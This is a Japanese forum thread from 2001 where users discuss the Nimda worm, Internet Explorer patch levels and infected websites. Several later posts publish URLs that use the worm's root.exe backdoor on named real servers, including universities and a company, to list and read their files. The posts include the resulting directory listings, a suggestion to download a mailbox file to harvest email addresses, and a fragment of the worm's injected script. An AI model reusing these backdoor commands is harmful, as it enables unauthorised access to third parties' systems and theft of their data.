他のソフトを通したほうがイイよ!!
0182名無しさん@お腹いっぱい。
NGNGだったらどうせアップするならIE6にしといた方がいいって考えていい?
IE5.5SP2の方がIE6より勝ってるとこあるの?
0183名無しさん@お腹いっぱい。
NGNG以前はウイルスバスター2001正規版を使っていた。
ロゴ出しはオフにすることができたような。
私も重い(またはウザイ)と感じて切っているスキに感染した(当時最新のVBでも感染したろうが。)。
重いと切ってはなんにもならない。
以後ノートンさんを使っているがこれは重いとは感じない。
が、使っているのはインターネットセキュリティーなので価格面で貴方の要望は満たせないと思う。
安い・軽い・高機能・安全 のすべてを満たすソフトなど私は知らない。
ウイルス関連ソフトはサーチ・駆除も重要だが、ニムダ以降ブロック機能も重要であると痛感した。
理由はともかく、この程度のソフトが運用できないなら、いずれ自分だけでなく他者にも迷惑をかけるのでネットを利用しないほうがよいと思った。
0184
NGNGhttp://www.d-link.co.jp/
0185名無しさん@お腹いっぱい。
NGNG>>26-30を読んで自分で判断してくれ。
「結局IE5.5のSP2も、IE6もセキュリティ上は変わらない」という記述を漏れは見ていないし、信じない。
>>26-30の後ろにもいくつか関連したカキコがある。
0186win2k+ie6 最悪
NGNGWin2000+ie6(最小構成時のみ)=Nimdaワームの影響を受ける恐れのある製品
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
2kは最小構成でしかインストールできないためIE6は駄目。
0187名無しさん@お腹いっぱい。
NGNGだっさー、これはダサイ(´Д`)
0188名無しさん@お腹いっぱい。
NGNG具体的な根拠ではないが、一般論として
新製品は使い込まれておらずバグが残っている可能性が高い。
0189182
NGNG「26〜30」の辺りも読んでみて、それでIE5.5SP2も危ないけど、IE6だって危ないよって、受けとめたわけっす。
ならばどっちも同じ条件で危なくて、どっちもSP1よりは危なくないならば、IE6のほうが新しくていいかなあ、って思ったわけっす。
それでもSP2を使ったほうがいいのだよ、っていう情報あるならば、もちろんその方を漏れは使いたいのだった。
舌足らずですんません。
0191WinMEですが、
NGNGファイル検索の「含まれる文字列」で" nimda "の文字列で検索をかけると
user.datのファイルにヒットしてしまう。これって何だろう?
0192名無しさん@お腹いっぱい。
NGNGメディアプレーヤが起動することもreadme.exeが自動実行されることもなく、
ダウンロード要求ダイアログが表示される。
ということで、W2K版IE6でも50.1SP2及び5.5SP2と同様の対策がされているものと思う。
IEインストールフォルダにあるreadme.txtの
>現在、Windows 2000 で標準インストールおよび完全インストールを実行することは
>できません。Internet Explorer 6 はシステムに既定のファイル セットをインストール
>します。これらは、Internet Explorer 6 の Web ブラウザおよびスクリプティングの
>サポートが含まれています。
という記述が現在の混乱を招いているようである。
0193
NGNG実行中のコマンドと思われ
0194
NGNGそれをいうならMicroSoft・・・。
0195名無しさん@お腹いっぱい。
NGNGWIN98以降にしろってメッセージが出てお終い。。。
ってなわけでIE5.5SP2にしました。
0196名無しさん@お腹いっぱい。
NGNG>「26〜30」の辺りも読んでみて、それでIE5.5SP2も危ないけど、IE6だって危ないよって、受けとめたわけっす。
すまん、漏れにはどうしてそいう判断になったのかわからん。
漏れ個人的には両方アブナイなら、どちらかといえばIE5.5SP2だろうし、もしあなたがIE5.0xを使っているならIE5.5などにせずIE5.01SP2を勧めたい。
IE6が安全であるという記述はどこにも発見出来ないと思うが・・。
0197名無しさん@お腹いっぱい。
NGNGnimdaを検索したからだろ。たぶん検索履歴だよ。
#user.datはレジストリファイルだ。
それから、nimdaは自身をnimdaと名乗ってないから
nimdaって文字列を探しても無意味だよ。
0198名無しさん@お腹いっぱい。
NGNGMSはダサイというのとは次元がちがう。MSはそういう会社。だからMSNが感染してもさもありなんと思うだけ。
0199名無しさん@お腹いっぱい。
NGNG正直、W2k+IE6で感染しちゃった人手を上げてー
0200名無しさん@お腹いっぱい。
NGNG> IEインストールフォルダにあるreadme.txtの
> >現在、Windows 2000 で標準インストールおよび完全インストールを実行することは
> >できません。Internet Explorer 6 はシステムに既定のファイル セットをインストール
> >します。これらは、Internet Explorer 6 の Web ブラウザおよびスクリプティングの
> >サポートが含まれています。
>
> という記述が現在の混乱を招いているようである。
言えてる。
Windows9xへの最小構成インストールだとOE6が入らないのに、
Windows2000へのインストールだとOE6が入るという一点をとっても
Windows2000のIE6は最小構成インストールだというのはウソ。
0201名無しさん@お腹いっぱい。
NGNG「nimdaに感染していないかどうか調べた」というのが、なにをやっているのかこの文面だとわからないけど、26-30を読んでみてくれ。
安易に検索などかけないほうがよいと思う。
0202名無しさん@お腹いっぱい。
NGNGIE6を入れる前のW2KのSPとIEのバージョンおよびSPを教えてくれませんか?
0203名無しさん@お腹いっぱい。
NGNGするとこれはデマか?
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20010919/3/
0204名無しさん@お腹いっぱい。
NGNGそうだとして、IE5.5SP2 よりも IE6 を推奨する理由は?
0205名無しさん@お腹いっぱい。
NGNG多分、感染すると思われ。
IE6+Win2KSP2+ノートン7.51(定義ファイル30920d)で感染サイトに行くと、
ノートン先生が水際で止めてくれる。
IEの確認ダイアログなんかは出てこない。
0206189
NGNG実はIE5.5にして不安定になったもんで、IE5.01でずっと使ってたんです。
それがSPだったもんで、今回見事にやられちゃって、それでめんどうだからOS入れ直しちゃえと思ったわけなんですけど、どうせピカピカになるなら新品のIE6などいいかなと思ったわけで(苦笑)
ほんとミーハーだ(苦笑)
そっかぁ、じゃ、IE5.01SP2にしときます。馴染んでたのでよかった。
ありがとうございました。
0207192
NGNGW2KSP2+IE5.5SP2
>>205
俺のとこではダイアログ出たんだよねえ。
まあ、この問題に関してはMSに直接聞いてみないとハッキリしないでしょ。
ちなみに、この板のように慎重で初物を警戒する人が少ないWin板では、
W2KとIE6の組み合わせでニムダにやられた!って騒いでる様子はないよ。
0208名無しさん@お腹いっぱい。
NGNG「タスク スケジューラの署名を確認しています」
ってところで止まってしまって、
ダウンロードが強制終了させられてしまうんですけど、
なにか対策はないでしょうか?
0209名無しさん@お腹いっぱい。
NGNG前スレでメディアプレーヤが起動したという報告があるけど、>>192の一例だけで全否定しちゃっていいのかな?安全の否定は簡単だが、危険の可能性の否定はそう簡単に出来ないと思うが・・。
0210チャレンジャー
NGNGノートン先生のAuto-Protectを切って感染サイトに行ったところ、
Windows Mediaのサイトにつながり
"Sorry, no more help is available for this problem at this time."
0211191
NGNGありがとう。問題はないと言う事ですね。
検索で他の文字列だとヒットしなかったので
ちょっと心配になったので聞いてみました
過去ログ>>26-30を見てきます。
0212名無しさん@お腹いっぱい。
NGNG危険の否定はしてないよん。
現実に回避できたので「対策がされているものと思う」と見解を出しただけ。
0213名無しさん@お腹いっぱい。
NGNGそういうHP開いてもインターネットセキュリティが防いでくれる?
0214困った。
NGNG0215名無しさん@お腹いっぱい。
NGNG少なくともリアルタイムスキャンを有効にしている限りは
0216
NGNGハア? IEのセキュリティホールってのは
JavaスクリプトにWAVファイルとしてreadme.exeを開けさせる
というのは常識ですよ?
0217
NGNG過去ログを調べようともしない質問君は放置ニダ!
0218名無しさん@お腹いっぱい。
NGNGそれ、いつもしてるのに、たまにしてない時とかに限ってそういうの起こるんですよね・・
なんとかの法則かな・・
っていうか、漏れがアホなだけか・・
0219名無しさん@お腹いっぱい。
NGNGマックは対策せんでもいいだろ
感染しないんだから
0220とにかく
NGNGhttp://www.microsoft.com/japan/technet/security/nimdaalrt.asp
Nimda ワーム の影響を受ける恐れのある製品
:
: ρ(^-^)インストールのやり方次第ということ
MicrosoftR Internet Explorer 6 (最小構成時のみ)
---
MicrosoftR Internet Explorer 6 は、MS公認の Nimda ワーム の影響を受ける恐れのある製品 であります。
0221名無しさん@お腹いっぱい。
NGNGサンクス。
どうもW2Kの場合IE6をインストールするまえの状態で、
どうも状況かわるみたい。ただ俺の場合キミと同じはずなんだが
MediaPlayerがエラーを出す。わけわからん^^;
IE6入れる前に最低W2KのSP2は入れておかないとよくないようだが…
0222
NGNG駄目!
ノートン入れてりゃなんでもOKだと思ってるんかい?
0223名無しさん@お腹いっぱい。
NGNG> 最小限のインストール
が最小構成インストールとは別物なのは確か。
>>204
別に推奨する気はない。
>>48 みたいな明らかなウソ(OE6がインストールされない)を書かれるのが
嫌で書いただけ。
0224名無しさん@お腹いっぱい。
NGNGハア?
0225
NGNG感染した可能性大。
0227205
NGNGもっかい試したが、やっぱでない。
IEの設定の問題か?<インストール時のまんま。
ただ、感染サイトにアクセスした後リブートすると、メディアプレーヤーのゾンビが残ってる。。。
その後スキャンかけても問題ないけど、新種の話はまだ出てないよね?
0228名無しさん@お腹いっぱい。
NGNGえええ、ノートン先生入れとけば、たとえ負債抱えてこわいおっちゃんに追いかけられても大丈夫なんじゃないんですか?
そのこわいおっちゃんのオンナに手ぇ出しても、ノートン先生入れてれば大丈夫なんじゃないんですかあ?
0229名無しさん@お腹いっぱい。
NGNGだから、IE5.01SP2入れとけってば
0230名無しさん@お腹いっぱい。
NGNGいくつかIE6で発生した問題現象が報告されている。
たまたま自分の環境でそうならかなったからといって、質問君が「IE6は?」と来ているときにいちいち質問君がIE6が安全であると誤解するような例をカキコするのはやめてくれ。
>>223
>>48 みたいな明らかなウソ(OE6がインストールされない)を書かれるのが
嫌で書いただけ。
なら最初からそう書いてくれ。
0231困った
NGNGあれま、探しても見つからない訳だ。
ありがと
0233名無しさん@お腹いっぱい。
NGNGたのもしい。 疲れるでしょうが頑張ってください。
教えて君はけっこう切実ですから、私も含めてほんと助かってます。
0234名無しさん@お腹いっぱい。
NGNG空きHDDが出たから2Kインストールして今から感染実験してみようと思う。
LINUX+Apacheに感染サイト作ってアクセスみればいいかな?
0235名無しさん@お腹いっぱい。
NGNG0236名無しさん@お腹いっぱい。
NGNG今までは「見つかっても実行しなきゃ大丈夫」とかって、最後の砦があったじゃん。
こんなウィルスがポピュラーになっちゃったら、またまたPC売れなくなっちゃうよ。
ビッグカメラあんなにPC館増やしてんのにどうすんねん。
0237名無しさん@お腹いっぱい。
NGNG>>LINUX+Apacheに感染サイト作ってアクセスみればいいかな?
かっこいいっo(><)o
実験が済んだら、ぜひLINUXやApacheならニムダに感染しないと声高に叫ぶバカのために、啓蒙サイト(無害化ニムダを送り込むとか)として公開してくださいm(_ _)m
0238名無しさん@お腹いっぱい。
NGNG> ビッグカメラあんなにPC館増やしてんのにどうすんねん。
このスレの趣旨とは無関係に激しく同意!(苦笑
0239名無しさん@お腹いっぱい。
NGNGそれとは違うだろ
0240名無しさん@お腹いっぱい。
NGNG別にいいじゃん
ビックカメラが潰れても他がある
0241先に釘を刺しておくが
NGNG感染時にフォーマット・再インストールは、有効であり唯一の確実な手段だが、
無条件にとにかくフォーマットという意見は聞き入れない。
各位には、安易にその場でフォーマットを援護射撃などされないよう充分注意されたい。
以上。
0242名無しさん@お腹いっぱい。
NGNG有楽町旧そごうビルに潰れ伝説ができる(w
0243名無しさん@お腹いっぱい。
NGNGttp://www1.sphere.ne.jp/noone/
0244234
NGNG2Kのインストールが遅い・・・・
0245名無しさん@お腹いっぱい。
NGNGそれはともかく、ニムダに感染したっつーとすぐ
LINUX にしろ だの Apache が感染するわけない だの Netscape だ だの
という手合いのはどうにかならないかね。
扱いによっては感染(MS語の 影響を受ける、か(苦笑))するということを分かっていてやっているのかどうか・・。
0246
NGNG週明けの社内ネット起動でもう一山あるだろうけど、
感染力が強力な割には、意外と早く収束した感じ。
0247名無しさん@お腹いっぱい。
NGNGだからその話をさっきしてたんだが。
結局鯖感染か、ユーザ感染かよくわからんな。
ま、可能性はいろいろあるとして、おれは故意だと思うけどね。
0248名無しさん@お腹いっぱい。
NGNGもしよかったらW2K(SPなし)にIE6インストールしてみて、感染するか
試してほしい…
このパターンだと感染する気がする…
0249名無しさん@お腹いっぱい。
NGNGそれは中継になるってことで感染はしないよな
感染経路を減らせるから確率落ちるんでないか?
0250
NGNGOE6にならないと感染するらしい。
0252名無しさん@お腹いっぱい。
NGNGどこが収束してるんだ?
http://wtc.trendmicro.com/wtc/
0253
NGNG0254名無しさん@お腹いっぱい。
NGNGあ、このサイトが悪意っていう意味?
わざとニムダディスペンス機能をアプしてると?
こりゃまた失礼m(_ _)m
0256名無しさん@お腹いっぱい。
NGNGW2K + IE6 …感染する
W2KSP2 + IE6 …感染しない (この状態でIE5.01SP2相当のはずだから)
W2K + IE5.5 + IE6…感染する (報告あり)
W2KSP2 + IE5.5 + IE6…感染する (W2KSP2にIE5.5をいれるとまずいという話を聞いた)
W2K + IE5.5SP2 + IE6…感染しない (IE5.5SP2が防いでくれるはず))
W2KSP2 + IE5.5SP2 + IE6…感染しない (俺の環境)
0257名無しさん@お腹いっぱい。
NGNGその話は知っているが、W2KにIE6を入れた場合、どのパターンでも
OE6にはなるようだ。(少なくともOEの画面表示は)
0258名無しさん@お腹いっぱい。
NGNGIISの記述が抜けてるぞ
0259名無しさん@お腹いっぱい。
NGNG俺がいってるのはIE経由の感染の話。
もちろんIIS経由の感染はまた別。
0260名無しさん@お腹いっぱい。
NGNGhttp://www1.sphere.ne.jp/
で感染する。
わざと置いてる可能性大
0262名無しさん@お腹いっぱい。
NGNGそうか。この期に及んで個人サイトで感染しているようなのはわざと置いているとみたほうが合理的か・・。
いまさらでスマソ。
0263
NGNGnimda居ないよ?
0264名無しさん@お腹いっぱい。
NGNG今後は気を付けないといけないなぁ・・。
0265263
NGNG0266名無しさん@お腹いっぱい。
NGNG漏れもいないと思った。
問題にしているのはここ。
tp://www1.sphere.ne.jp/noone/
0267160
NGNGだぁから
www1.sphere.ne.jp/noone/で感染してるのに、
鯖www1.sphere.ne.jpで感染してないから
故意じゃないかって逝ってるんだよ。
0268名無しさん@お腹いっぱい。
NGNGあ、そゆことね。失礼。
0269名無しさん@お腹いっぱい。
NGNGそれ、どのウイルスも0で終わってるだろ
収束してるんじゃないよ
0271名無しさん@お腹いっぱい。
NGNG0272名無しさん@お腹いっぱい。
NGNGMS(KK)のスタッフはこの連休中も徹夜でこういう検証をやっているのだろうか?やっていないな、たぶん。
0274160
NGNG説明不要だろ?それから>>260はおれではない。
騒ぐまえに鯖がIISかどうか調べたか?
IISでなかったらどのような経路で感染したか考えたか?
Apache自体が直接的に感染することはないんだから
Windowsから感染したファイルが流れ込んだしかないだろ。
商業プロバイダはファイル転送は個人個人なんだから
プロバイダ鯖経由で感染とは考え難く、
www1.sphere.ne.jp/noone/が故意か誤ってかユーザ経由で
感染させてるしかないだろう。
それくらい自分で頭働かせろ。今更なにいってんだ。
0275やる必要無いじゃん
NGNGこの際全部IE6にすれば感染しないホラを吹きまくって
ユーザを無理矢理IE6へ移行させる作戦さ♪
0276名無しさん@お腹いっぱい。
NGNGは、ここの被害の2に当たると思われ
http://www.trendmicro.co.jp/virusinfo/important3.htm#penimdaa
0277名無しさん@お腹いっぱい。
NGNG最初からそのくらい書いてくれりゃいいのに・・。
0278名無しさん@お腹いっぱい。
NGNG冗談抜きにそういう信仰があるよな。
一般のPCには感染しないなんてカキコまであって、見たときは吹いた。マジで。
0279名無しさん@お腹いっぱい。
NGNG0280名無しさん@お腹いっぱい。
NGNG不信なメールに注意しろってアナウンスがあったぞ。(Webからの感染には一切ふれず)
で、ウィルスチェックをかかさずやりましょうって。それは間違ってないが、IEの
穴をふさぐのが先だろっつーの。あきれたよ。
0281名無しさん@お腹いっぱい。
NGNGXPはでっかい穴があいてる予感がするので様子見ることにしてる。
−>根拠なし、ただの経験則。
0282名無しさん@お腹いっぱい。
NGNG一般にSPは2から、バージョンは3からっていうMSの法則がありますよね(^^;
0283名無しさん@お腹いっぱい。
NGNG0284名無しさん@お腹いっぱい。
NGNGIEなんか使うから天誅くらうんや。
厨房を見習え!
0285名無しさん@お腹いっぱい。
NGNGついに誰か書き込んだな。初の書き込みがこれか…(笑
0286名無しさん@お腹いっぱい。
NGNG0287名無しさん@お腹いっぱい。
NGNGhttp://www1.sphere.ne.jp/cgi-bin/common1/bbs/bbs.cgi
わはは。暗澹たる船出ですね(^^;
0288名無しさん@お腹いっぱい。
NGNG最高!
0289名無しさん@お腹いっぱい。
NGNGか~ しヽ ιゅ⊃ です>>245
0290名無しさん@お腹いっぱい。
NGNGここ変わったぞ
0291名無しさん@お腹いっぱい。
NGNG0292名無しさん@お腹いっぱい。
NGNG0293名無しさん@お腹いっぱい。
NGNGここはいつだろね
0294名無しさん@お腹いっぱい。
NGNG良いことだネ!
0295やや
NGNGNT4.0SP5を当てたくない事情があるんですが、この環境のままで当てられるパッチってないですかね?
0296名無しさん@お腹いっぱい。
NGNG0297名無しさん@お腹いっぱい。
NGNGかなりクサイですね
0298名無しさん@お腹いっぱい。
NGNG0299名無しさん@お腹いっぱい。
NGNGhttp://www1.sphere.ne.jp/cgi-bin/common1/bbs/bbs.cgi
0300
NGNG0301名無しさん@お腹いっぱい。
NGNGそんな気もする。でも結構前から話題だったよね。
0302名無しさん@お腹いっぱい。
NGNGわざとってことにしておかないと気むずかしいヒトが気を悪くするのそういうことにしてあげておいて・・。
0303234
NGNGでもそれらしいプロセスは走っていない。
キャッシュにはreadmeがあるけどキャッシュを削除すると消えるし何も悪さしてなさそうだよ。
0304
NGNG ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
Λ_Λ
( ゜∀⊂ヽ ニヤリ
⊂ ノ
人 Y
し (_)
0305名無しさん@お腹いっぱい。
NGNGありがとー。もひとつお願い。その状態でMediaPlayerをアンインストール
してアクセスするとどうなるでしょうか?
0306234
NGNG多分ファィルが壊れていると見ている。
>>305
実はちょっとオンラインでもやってみたんだが・・・火暴
はじめはメディアプレーヤーがインストールしてない状態だったので
インストールをしねーか?と聞かれた。
悪さしてないのを確認しながら無事インストール。
その後メディアプレーヤーの立ち上げには失敗している。
IEは固まる。
プロセスの異常はなし。しかしキャッシュにはダウンロードされている。
キャッシュのニムダは何も悪さしていない。
0307名無しさん@お腹いっぱい。
NGNGうまくいくと(藁)、ウィルスが実行されるはず。
0308234
NGNGアンインストールして今度はオフラインでやってみるね。
0309名無しさん@お腹いっぱい。
NGNGMediaPlayerがあるとwaveファイル(nimdaが装ってる)は必ずそれに
ファイルを渡すから、実行されない。もちろんMediaPlayerは変なフォーマット
のファイルがくるからエラーを起こすけど。
0)
MediaPlayerがないと、IEは他のアプリを使ってwaveファイルを実行
使用とする。この時、拡張子が正しくwavとかなら、再生用のアプリに
渡されるけど、nimdaは拡張子がexeなので、そのまま実行してしまう。
IE5.5とかIE5.01とかは。
1)
IE5.5SP2では拡張子がexeのファイルはファイルダウンロードの処理に
なるように変更されている。
2)
IE6の俺の環境では処理が違ってて、拡張子をtmpに変えて、それを
実行しようとする。もちろん拡張子がtmpのファイルを再生できるアプリ
もないし、tmp自体をexe見たいに実行することもできないから、
どのアプリで開くか?ってダイアログが出る。
1)や2)はどうやらOutlookExpress関連のプログラムがやっている
みたいで、もしW2KにIE6をインストールしたとき、OutlookExpree関連
のプログラムを完全には更新されないとすれば、そのまま実行して
しまうはず。
0310234
NGNGその時点で既にwbk4.tmpというファィル名になっている。
0311名無しさん@お腹いっぱい。
NGNG234殿には俺の感謝を捧げたい。
0312234
NGNG実行はしていないようです。
MSはキャッシュのニムダをウィルスソフトが検知してしまう為
あるいはメディアプレーヤー起動でブラクラ状態になってしまうので
IE6も追加したのかなー?
それとももっと違う条件があるのだろうか?
0313名無しさん@お腹いっぱい。
NGNGIE6とW2Kの謎がだいぶ解き明かされてきたね。
0314名無しさん@お腹いっぱい。
NGNGあれ?そうなんだ…
うーん、その動作は俺のW2KSP2+IE5.5SP2にIE6をインストールした
時と同じで、非常にすばらしいんだが…
それだと、何個か耳にするW2K+IE6は危険って話は、どう解釈したらよいもんか…
なんにしても、いろいろ、ありがとうございました。(__)
0315名無しさん@お腹いっぱい。
NGNGW2K + IE6 …感染しない(234さんの環境)
W2KSP2 + IE6 …感染しない (この状態でIE5.01SP2相当のはずだから)
W2K + IE5.5 + IE6…感染する (報告あり)
W2KSP2 + IE5.5 + IE6…感染する (W2KSP2にIE5.5をいれるとまずいという話を聞いた)
W2K + IE5.5SP2 + IE6…感染しない (IE5.5SP2が防いでくれるはず))
W2KSP2 + IE5.5SP2 + IE6…感染しない (俺の環境)
0316234
NGNG発病はしないに決定。
もうHDDを元に戻します。
0317ニ武田 浩二
NGNG0318
NGNG0319名無しさん@お腹いっぱい。
NGNG0320名無しさん@お腹いっぱい。
NGNG0321名無しさん@お腹いっぱい。
NGNG0322名無しさん@お腹いっぱい。
NGNGあんた、毎日暇なんだねぇ
0323名無しさん@お腹いっぱい。
NGNGて言うかおもしろい
0324名無しさん@お腹いっぱい。
NGNG何が?
0325名無しさん@お腹いっぱい。
NGNG未使用ポートブロック機能が通信をブロックしました。 詳細:
でノートン先生のログがすごいのだが。
これって Nimda のせい?
0326
NGNG80未仕様?つうかサーバー?
0327名無しさん@お腹いっぱい。
NGNGCordRed
未使用ポート遮断機能が通信を遮断しました。 詳細:
インバウンド TCP 接続
リモートアドレス、 ローカルサービスは ***.***.***.***,http
0329名無しさん@お腹いっぱい。
NGNG>ニムダ、コードレッド、ニムダ、コードレッド、ニムダ、コードレッド
>ニムダ、コードレッド、ニムダ、コードレッド、ニムダ、コードレッド
>いいかげんにしてくれ〜
ネタ決定だな。
親切に掲示板に書き込んだ人。ご苦労さん(w
0330名無しさん@お腹いっぱい。
NGNGまだ雑誌のCD-ROMとかで配布してないのかなぁ。
0331名無しさん@お腹いっぱい。
NGNG俺にとってはいいネタだったよ。掲示板に、
このHP
nimdaに感染してるんで閉鎖して下さいね。
って、1つだけポツンと書き込まれてたときは爆笑した。
0332>
NGNGCD-ROMとか緊急でリリースすべきだろうね。
遅い回線を使ってたらダウンロード大変だし。。。
0333ん〜ま
NGNGbase64はデコードできないのかな?中途半端ですなあ。
0334名無しさん@お腹いっぱい。
NGNG>base64はデコードできないのかな?
違うと思うぞ。
検索オプションの検索対象に”ユーザー選択”選んでないか?
してるんなら”すべて”か”トレンドマクロ推奨で”もう一度検索してみて。
0335/
NGNG0336名無しさん@お腹いっぱい。
NGNGI IS A BOY とは、笑える。どこの人かな?
^^^
hacker by jsl 2001 09 07 I LO
VE YOU I IS A BOY</p>
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=n
o,top=6000,left=6000")</script></html>
0337厨房クラッカーだな(藁
NGNGCodeRed、NIMDAに感染してバックドア開きっぱなしのサーバ
攻撃してもねぇ・・・
自分の低レベル振りをアピールして恥ずかしくないのかねぇ?(藁
0338名無しさん@お腹いっぱい。
NGNGWin2KのSP2なら、マイクロソフトのサイト(下のURL)で申し込めば、
無償で送ってくれるよ。1週間くらいでとどく。
http://www.microsoft.com/japan/windows2000/downloads/servicepacks/sp2/default.asp
んで、IE5.01のSPは、Win2KのSP2に入っている。
0339330
NGNG早速申し込みました。
おれのWin不正シリアルなんだけど、ま、いっか
0340名無しさん@お腹いっぱい。
NGNG・・・・こいつニムダわかってないよな(^^;
0341名無しさん@お腹いっぱい。
NGNGNimdaは人間にも感染するのデス。2chという経路で。
ひがなNimdaの話題に専念させ、本来の機能を著しくパワーダウンさせるのデス。
あなたもすでに感染していマス。
0342名無しさん@お腹いっぱい。
NGNGttp://www1.fl.kansai-u.ac.jp/
いまさら感染するなよ。
0343名無しさん@お腹いっぱい。
NGNGえΣ<(゜▽゜;)>
0344名無しさん@お腹いっぱい。
NGNG接触研究会だってよ(w
0345名無しさん@お腹いっぱい。
NGNGここ連絡先ないじゃん!
0346名無しさん@お腹いっぱい。
NGNGやっぱあれだね、長いこと更新せずほってあるようなところがよく感染したままになってるね(^^;
0347名無しさん@お腹いっぱい。
NGNG0348
NGNG0349名無しさん@お腹いっぱい。
NGNGバックドア開きっぱなしじゃん。
0350名無しさん@お腹いっぱい。
NGNG駆除した跡はあるから再感染だな。
バックドア開けっ放しじゃ駆除しても意味ないんだよ…
0351名無しさん@お腹いっぱい。
NGNG2001/09/23 04:36p 57,344 Admin.dll
2001/09/23 04:36p 517 default.asp
2001/09/23 04:36p 517 default.htm
2001/09/20 01:46a <DIR> DrWatson
2001/09/23 04:36p 517 index.asp
2001/09/23 04:36p 517 index.htm
2001/09/23 04:36p <DIR> InetPub
2001/06/23 12:09p <DIR> JUST
2000/09/13 04:27p <DIR> KPCMS
2001/09/22 01:30p <DIR> NIMDASCN
2000/06/17 03:08p <DIR> Perl
2001/09/22 02:30p <DIR> Program Files
2001/09/23 04:35p 79,225 readme.eml
2001/09/24 05:43p <DIR> TEMP
2001/09/23 07:19p 57,344 TFTP10060
2001/09/23 07:19p 57,344 TFTP10104
・・・省略・・・
2001/09/23 07:17p 57,344 TFTP9952
2001/09/22 01:30p <DIR> ToFolder
2001/07/21 03:36p <DIR> Windows Update Setup Files
2001/09/23 04:35p <DIR> WINNT
1555 File(s) 88,849,805 bytes
11 Dir(s) 821,965,312 bytes free
めちゃくちゃだな・・・
0352名無しさん@お腹いっぱい。
NGNGこーどれっどかなんかに感染して、外面上だけ駆除して、後生大事にバックドアは保持してるってこと?(^^;
その後もニムダとかにかかって、また外面上だけ修復しても、バックドアは大切に保持?(^^;;;;
0353名無しさん@お腹いっぱい。
NGNGすげえ、なんでもできるね(^^;
0354-
NGNGhttp://members.tripod.co.jp/bingo852/
0355名無しさん@お腹いっぱい。
NGNGhttp://www1.fl.kansai-u.ac.jp/scripts/root.exe?/c%20dir%20c:\progra~1
0356名無しさん@お腹いっぱい。
NGNGTrendmicro_Nimdaの挙動のまとめ(ガイシュツかも)
0357名無しさん@お腹いっぱい。
NGNG0358名無しさん@お腹いっぱい。
NGNG>>>342-349
> 駆除した跡はあるから再感染だな。
2001/09/22 01:30p <DIR> NIMDASCN
これか・・・。
> バックドア開けっ放しじゃ駆除しても意味ないんだよ…
しょーがねーなぁ・・。
0359名無しさん@お腹いっぱい。
NGNGhttp://61.134.4.14/scripts/root.exe?/c%20dir%20c:\
0360名無しさん@お腹いっぱい。
NGNGありゃまあ・・。
0361名無しさん@お腹いっぱい。
NGNGhttp://210.12.157.160/scripts/root.exe?/c%20dir%20c:\
0362名無しさん@お腹いっぱい。
NGNGhttp://210.12.157.160/scripts/root.exe?/c%20type%20c:\readme.eml
0363名無しさん@お腹いっぱい。
NGNGhttp://www.maruko-j.co.jp/scripts/root.exe?/c%20dir%20c:\Progra~1
0364名無しさん@お腹いっぱい。
NGNG0365名無しさん@お腹いっぱい。
NGNG宝塚造形芸術大学 短期大学部
http://www.takara-univ.ac.jp/scripts/root.exe?/c%20dir%20c:\
http://www.takara-univ.ac.jp
0366名無しさん@お腹いっぱい。
NGNG選んでる場合じゃないよ・・。>志望学生
宝塚造形芸術大学 短期大学部
情報化社会に即対応の専門技術を習得する。
あなたの感性、技術を生かせるコース、じっくりと選んでほしい。
0367名無しさん@お腹いっぱい。
NGNGhttp://hoge.or.jp/scripts/root.exe?/c%20net%20send%20localhost%20むにゃむにゃ
で警告出来ないものかのう…。
0368名無しさん@お腹いっぱい。
NGNGたとえこちらで気付いても、ニムダさわぎでWebページは閉じていて連絡先が分からないところも多いよ・・。
0369名無しさん@お腹いっぱい。
NGNG0370名無しさん@お腹いっぱい。
NGNGこういうところは鯖ほったらかしで、たとえコンソールなどに警告しても見てないと思われ・・。
0371
NGNG0372名無しさん@お腹いっぱい。
NGNGそのためのwhois。自動化できないものか。
0373名無しさん@お腹いっぱい。
NGNGなかなか他人には言えないもんだよなぁ
0374名無しさん@お腹いっぱい。
NGNG0375名無しさん@お腹いっぱい。
NGNGいやーん、はずかしくて言えない(ノ_;)
0376名無しさん@お腹いっぱい。
NGNGhttp://www.takara-univ.ac.jp/scripts/root.exe?/c%20dir%20c:\
気付いてますか?
Directory of c:\
01/09/21 03:44p 524,288 20010921log.evt
99/04/28 04:09p 0 AUTOEXEC.BAT
99/04/28 05:12p 279 BOOT.PCP
99/04/28 04:09p 0 CONFIG.SYS
99/04/28 05:13p <DIR> DMI
99/04/28 05:14p <DIR> ESM
01/09/22 02:15a 988,652 Exchange Server Setup.log
01/03/10 11:06a <DIR> exchsrvr
01/09/22 01:01a <DIR> InetPub
01/09/20 10:33a <DIR> log_backup
01/09/22 01:51a 6,220 mpssetup.log
01/03/02 11:40a <DIR> msp
99/04/28 04:37p <DIR> Multimedia Files
01/09/22 02:23a 402,653,184 pagefile.sys
01/09/21 05:49p <DIR> Program Files
01/09/19 03:26p <DIR> recycled
01/09/22 01:01a <DIR> scremove
01/09/22 01:06p <DIR> TEMP
01/01/10 06:37p 53,019 ucspi-tcp-0.88.tar.gz
99/04/28 04:40p <DIR> update
01/03/02 11:36a <DIR> urlcache
01/09/23 03:05a <DIR> WINNT
00/05/22 04:19p 12,800 Step2.doc
01/09/20 07:03p <DIR> デスクトップ
24 File(s) 404,238,442 bytes
2,799,830,016 bytes free
0377名無しさん@お腹いっぱい。
NGNGこれで、CodeRedも含めて少しは静かになればいいんだが。
0378377
NGNG0379名無しさん@お腹いっぱい。
NGNG一つ気になったがこれはなんだろうか?>宝塚ほげほげ学園
00/05/22 04:19p 12,800 Step2.doc
思うに、学生の課題と思われ・・。
0380名無しさん@お腹いっぱい。
NGNG\Identities\{****-****-****-****-************}\Microsoft\Outlook Express\受信トレイ.dbx
をDLしてメールアドレスを探る。
0381名無しさん@お腹いっぱい。
NGNGページへのリンク貼ってあったと思うんだけど
わかる人いますか?
0382名無しさん@お腹いっぱい。
NGNG流石にそれは捕まるだろ(藁
0383名無しさん@お腹いっぱい。
NGNG何で?
0384名無しさん@お腹いっぱい。
NGNG結局、解る奴にとっては色々遊び場増えるのね(w
てーか、初期の頃オリエントのサイト感染してたのには笑ったけど。
俺、オリコカード作ってないから良いけど。
公開サーバには流石に置かないか。
0385
NGNGこれで馬鹿な管理者も気付くだろう?
0386名無しさん@お腹いっぱい。
